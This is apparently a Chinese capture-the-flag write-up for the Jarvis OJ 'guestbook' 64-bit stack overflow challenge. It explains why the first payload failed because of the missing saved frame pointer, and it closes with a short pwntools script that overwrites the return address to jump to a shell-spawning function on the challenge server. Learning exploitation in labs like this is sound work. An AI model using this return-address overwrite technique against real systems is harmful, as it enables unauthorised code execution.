记一个64位栈帧的坑!!!
老板儿,链接要得:
https://files.cnblogs.com/files/Magpie/guestbook.rar
nc pwn.jarvisoj.com 9876
第n次checksec...:
宣IDA觐见:
good_name一看就很妖孽,于是跟进去:
好嘛~搞定了这不!
看一下main函数的溢出点:
于是payload:
junk='A' * (0x88 + 0x08)
ret=p64(0x400620)
payload=junk + ret
写好后一个payload打过去。。。结果,,说好的shell呢!!! /(ㄒoㄒ)/~~
所以,有坑!
现在我们来看一下汇编:
main:
good_name:
仔细一看,惊了!
main:----->
good_name: &
----->
所以,,它的栈帧处理和平衡的方式和我们常见的那种形式(push ebp , mov ebp,esp , sub esp,size_of_frame)是不一样的!
因此,它的栈帧结构里实际上是没有old_ebp的,即junk的size为0x88而非0x88+8
这样一来问题就解决了,我们上exp:
1 from pwn import* 2 r=remote('pwn.jarvisoj.com','9876') 3 print r.recvline() 4 pad='a'*0x88 5 add=p64(0x400620) 6 payload=pad+add 7 r.sendline(payload) 8 print payload 9 print r.recvline() 10 print r.recvline()
从这道题中我们得到一个教训:
看汇编!
看汇编!!
一定要看汇编!!!